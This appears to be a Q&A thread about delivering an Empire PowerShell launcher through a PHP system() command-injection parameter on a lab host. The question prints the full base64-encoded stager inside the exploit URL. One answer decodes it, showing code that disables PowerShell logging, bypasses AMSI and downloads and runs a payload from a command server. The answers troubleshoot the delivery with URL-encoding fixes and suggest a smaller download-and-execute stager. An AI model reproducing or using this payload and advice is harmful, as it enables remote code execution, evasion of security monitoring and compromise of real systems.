# Why Empire Launcher payload is not working in system() in PHP?

Tags: php, vulnerability, code-execution

I created a parameter passing through `system()` i.e. cmd. Now I run Empire tool with http listener and launch powershell launcher. Got the huge bunch of base64 encode string.

Now I pass this string to the parameter `cmd`, which was passing through the `system()`, I thought I would get an agent in empire but instead I saw an error in the web page:

```
    <html>



<center><h1>Hack Me Please </h1>

<h3>Demo</h3>

</center>

//ERROR STARTING FROM HERE

Cannot process the command because the value specified with -EncodedCommand is not properly encoded. The value must be Base64 encoded.


PowerShell[.exe] [-PSConsoleFile <file> | -Version <version>]
    [-NoLogo] [-NoExit] [-Sta] [-NoProfile] [-NonInteractive]
    [-InputFormat {Text | XML}] [-OutputFormat {Text | XML}] 
    [-WindowStyle <style>] [-EncodedCommand <Base64EncodedCommand>] 
    [-File <filePath> <args>] [-ExecutionPolicy <ExecutionPolicy>]
    [-Command { - | <script-block> [-args <arg-array>]
                  | <string> [<CommandParameters>] } ]

... <snipped> ...
```

As I can read that some escaping is going in base64 string but I don't know why? But I tried to pass that string directly to `system(base64)` and I can successfully get the agent in Empire but why can't get it through that way?

I did same thing with `curl`. And the result was the same.

Any suggestion would help me in this.

Here is the Base64 payload:

```
  http://192.168.0.5:9999/exploitme.php?cmd=powershell%20-noP%20-sta%20-w%201%20-enc%20SQBGACgAJABQAFMAVgBlAFIAcwBpAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBlAFIAcwBJAG8AbgAuAE0AQQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAUwBzAEUAbQBCAGwAWQAuAEcAZQBUAFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAdABWAEEAbABVAGUAKAAkAE4AVQBsAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBMAD0AWwBDAG8AbABsAGUAYwBUAEkATwBuAHMALgBHAGUAbgBFAHIASQBjAC4ARABJAEMAdABpAG8AbgBBAHIAeQBbAHMAdABSAEkAbgBHACwAUwBZAHMAdABFAG0ALgBPAEIAagBFAGMAVABdAF0AOgA6AG4AZQB3ACgAKQA7ACQAVgBBAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUAbABzAEUAewBbAFMAYwByAGkAUABUAEIATABPAEMASwBdAC4AIgBHAGUAVABGAGkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAdQBFACgAJABOAFUAbABMACwAKABOAEUAdwAtAE8AQgBqAGUAYwB0ACAAQwBvAGwATABFAEMAdABpAG8AbgBzAC4ARwBFAG4ARQBSAEkAQwAuAEgAQQBzAGgAUwBFAHQAWwBzAHQAcgBpAG4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBiAEwAWQAuAEcAZQB0AFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBJAGUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEAbABVAGUAKAAkAE4AdQBsAEwALAAkAHQAUgB1AEUAKQB9ADsAfQA7AFsAUwB5AFMAVABFAE0ALgBOAEUAVAAuAFMAZQByAHYAaQBDAGUAUABPAEkATgB0AE0AYQBOAEEARwBFAHIAXQA6ADoARQBYAFAAZQBDAHQAMQAwADAAQwBPAG4AVABJAE4AdQBlAD0AMAA7ACQAVwBjAD0ATgBFAFcALQBPAEIASgBFAEMAVAAgAFMAWQBTAFQARQBtAC4ATgBlAHQALgBXAGUAQgBDAEwAaQBFAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAQwAuAEgARQBhAGQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBPAHgAWQA9AFsAUwB5AHMAVABFAE0ALgBOAGUAVAAuAFcARQBCAFIAZQBxAHUARQBzAHQAXQA6ADoARABFAGYAYQBVAGwAdABXAGUAYgBQAHIATwB4AFkAOwAkAHcAYwAuAFAAcgBPAFgAeQAuAEMAUgBlAGQAZQBuAHQAaQBhAEwAUwAgAD0AIABbAFMAWQBTAFQAZQBNAC4ATgBFAHQALgBDAHIAZQBkAEUAbgBUAGkAYQBsAEMAYQBjAEgAZQBdADoAOgBEAGUAZgBhAFUAbABUAE4AZQB0AHcAbwByAEsAQwByAGUAZABFAG4AdABpAGEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAVABlAG0ALgBUAGUAWABUAC4ARQBOAEMAbwBEAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAcwAoACcAPAAvAHEAOQBYADQAdgAuAEkAMwA4AGwAWwB1AHsAMAA6AH0AYQA+AHQAKABlAFMAQgBwADEAZwBiAHgAOwB+ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADEAOgA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAFcAQwAuAEgARQBBAEQARQBSAFMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AFcATQBkACsAdwBNAHYAdABiAEMAUgBwAFoAZgBPAHIANwAwAEwASAA4AFoAMABzAFYAWQBjAD0AIgApADsAJABEAGEAVABBAD0AJABXAEMALgBEAE8AdwBuAEwAbwBBAEQARABhAHQAYQAoACQAcwBlAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABEAGEAdABhAD0AJABkAGEAdABBAFsANAAuAC4AJABkAGEAVABBAC4AbABFAE4AZwBUAGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABEAEEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
```

This is the **exact** payload that is sent to the server.

Answer (score 2):

```
 http://192.168.0.5:9999/exploitme.php?cmd=powershell...-enc%20SQB.../...+...+...=
```

The URL will be parsed and the parameters decoded before passing it to `system`.  But you've included characters which have a special meaning in the URL without proper encoding. For example `+` will be decoded into space and `=` might be treated as part of `key=value`. `/` might be interpreted in a special way to. This will break your base64 payload.

To prevent this you need to properly [URL-encode](https://www.urlencoder.org/) these characters inside the payload, i.e. encode as `%HH`where HH is the hexadecimal representation of the character. Thus `+` should be encoded as `%2B`,  `=` as `%3D` and `/` as `%2F`.

Comment: Correct me if i am wrong, but b64 will never have special character like `+`. And `=` is only found at the end. If if there are other get paramters , it will be seperated by `&` which wont allow an anomaly like that.

Comment: I am sorry Steffen, I did like as you said but still can't executed.

Comment: @AshutoshRaina: *"Correct me if i am wrong,"* - Yes, you are wrong regarding `+`. See number  62 in [Wikipedia:Base64 - Base64 table](https://en.wikipedia.org/wiki/Base64#Base64_table). But yes, `=` should only be at the end but it might still be relevant for the decoder (depends on actual decoder).

Comment: @UtkarshAgrawal: While you say that you did as I said I have no idea what you really did. I recommend that you modify the PHP code where you call `system` to also provide in the output the exact command line you've used in `system` so that you can actually compare what you intended to do with what you actually did.

Comment: @AshutoshRaina: *"...but in his case '+' in not present is his b64 string anyway "* - Wrong again, the `+` is included two times in his base64 string.

Answer (score 1):

Looks like the error what your console is throwing is correct .
If you decode your base 64 string you get a powershell script like this

```
IF($PSVeRsiOnTABlE.PSVeRsIon.MAjor -GE 3){
    $GPF=[rEF].ASsEmBlY.GeTTypE('System.Management.Automation.Utils')."GEtFiE`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');
    If($GPF){
        $GPC=$GPF.GEtVAlUe($NUll);
        IF($GPC['ScriptB'+'lockLogging']){
            $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
            $GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0
        }
        $vAL=[CollecTIOns.GenErIc.DICtionAry[stRInG,SYstEm.OBjEcT]]::new();
        $VAl.ADd('EnableScriptB'+'lockLogging',0);
        $vaL.ADd('EnableScriptBlockInvocationLogging',0);
        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ElsE{[ScriPTBLOCK]."GeTFie`Ld"('signatures','N'+'onPublic,Static').SeTVALuE($NUlL,(NEw-OBject ColLECtions.GEnERIC.HAshSEt[string]))}[Ref].ASsEMbLY.GetTyPe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFIelD('amsiInitFailed','NonPublic,Static').SEtVAlUe($NulL,$tRuE)
    };
};
[SySTEM.NET.ServiCePOINtMaNAGEr]::EXPeCt100COnTINue=0;
$Wc=NEW-OBJECT SYSTEm.Net.WeBCLiEnt;
$u='Mozilla/5.0 (Windows NT 6.1;
 WOW64;
 Trident/7.0;
 rv:11.0) like Gecko';
$WC.HEadeRs.AdD('User-Agent',$u);
$wc.PrOxY=[SysTEM.NeT.WEBRequEst]::DEfaUltWebPrOxY;
$wc.PrOXy.CRedentiaLS = [SYSTeM.NEt.CredEnTialCacHe]::DefaUlTNetworKCredEntialS;
$Script:Proxy = $wc.Proxy;
$K=[SysTem.TeXT.ENCoDing]::ASCII.GeTBYtes('</q9X4v.I38l[u{0:}a@@p@ @@@@ p0@0 PP PPP@@@0@@@P@0P@P P`@0@@0@@0@@0@@@P@@P P`@@@0@P P`@0@@0@@0@@0@@  @0@0@@0@P P`@0P p@@ `p@@p@pP@p@p0P@P 0@@ 0P  0P00p@p`@ 0 ` p0`0 @@@@p0@p@@@@0P @@@`@@@0@@@@@@@@@@Pp@0 `@ @@@@`@P
```

As you can see in last line , the powershell interpreter will not process is as it looks like truncated as it iss missing `')`. You need to investigate as to why your b64 string is incomplete.

**Another Point**:
Even if i assume that the b64 is correct, the length of your URL will exceed 2,083 characters (currently its 4810 chars and still the payload is truncated) What i would suggest is small payload that will download the larger powershell file (from some arbitrary location) and run it directly.
But as far as i know, this limitation wont happen is you are using curl , only if you are using browsers (chrome,firefox,ie etc..)

Also, Try and use get encoded bytes like this

```
$K = [System.Text.Encoding]::ASCII.GetBytes([Convert]::FromBase64String('<==base64payload here==>'))
```

That way you can be sure that no special character has terminated your string unexpectedly.